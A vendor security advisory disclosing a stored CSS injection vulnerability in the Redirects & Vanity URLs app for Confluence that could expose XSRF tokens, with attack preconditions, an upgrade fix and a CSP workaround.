2026-01-19 Stored CSS Injection allowing for XSRF token Extraction

Summary

This advisory discloses a high severity security vulnerability affecting Redirects & Vanity URLs for Confluence versions 3.0.0 to 3.1.2.

Please upgrade your installation of the app to version 3.1.3 or later to fix this vulnerability.

Details

The Redirects & Vanity URLs app does not properly sanitize certain user-controlled input when rendering it in the app UI. Under specific circumstances, this could allow an attacker to inject arbitrary styles, changing the content of the page or exfiltrating page content including the XSRF token protecting the victim against XSRF attacks.

For a successful CSS injection attack, the following requirements must be met:

• The attacker must have the ability to create or edit Confluence pages and prepare one for the exploit

• The victim must

  • have a Confluence account

  • have the ability to view the Confluence page and

  • be allowed to open the management UI of the App by being

    • in the link modification user group or

    • a Confluence Administrator or

    • a System Administrator

• The victim must either

  • visit a link prepared by the attacker or

  • organically visit the app’s management UI from the prepared page’s action menu

For the full potential of the attack to be realized

• The attacker must then successfully execute an XSRF attack on the victim

What You Need to Do

Upgrade the Redirects & Vanity URLs app to version 3.1.3 or later.

As a workaround, you could define a rule in your load balancer or reverse proxy that enhances Confluence's built-in CSP header to only include style-src from Confluence ('self'). However, this may break Confluence or other apps and will only prevent extraction of page content such as the XSRF token while still allowing defacing of the page. Upgrading is strongly recommended.

Support

If you have questions or concerns regarding this advisory, please raise a support request via our Support Portal.